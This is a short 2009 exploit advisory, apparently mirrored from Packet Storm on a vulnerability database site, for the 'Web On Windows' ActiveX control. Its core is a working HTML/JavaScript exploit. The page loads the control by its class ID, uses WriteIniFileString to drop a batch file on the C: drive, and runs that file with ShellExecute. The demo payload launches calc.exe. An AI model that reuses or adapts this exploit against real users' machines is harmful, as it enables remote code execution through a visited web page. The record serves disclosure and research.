Lucene search
+L

Web On Windows Code Execution

🗓️ 29 Jan 2009 00:00:00Reported by Michael BrooksType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Web On Windows Code Execution - Remote File Upload and Registry Acces

Code
`Written By Michael Brooks  
Special thanks to str0ke!  
  
software:WOW - Web On Windows ActiveX Control 2 - Remote Code Execution  
exploit type: Remote File Upload and Remote Code Execution  
Download: http://www.download.com/WOW-Web-On-Windows-ActiveX-Control/3000-2206_4-10049976.html  
183,682 downloads at the time of publishing this exploit.  
  
This entire dll is full of bad functions, including read write access  
to the registry.  
This must have been accidentally registered to IE's ActiveX interface.  
  
<html>  
<object classid="clsid:441E9D47-9F52-11D6-9672-0080C88B3613" id="obj">  
</object>  
</html>  
<script>  
obj.WriteIniFileString("C:\\hack.bat","","calc.exe ","");  
obj.ShellExecute(0,"open","hack.bat",0,"C:\\",0);  
</script>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation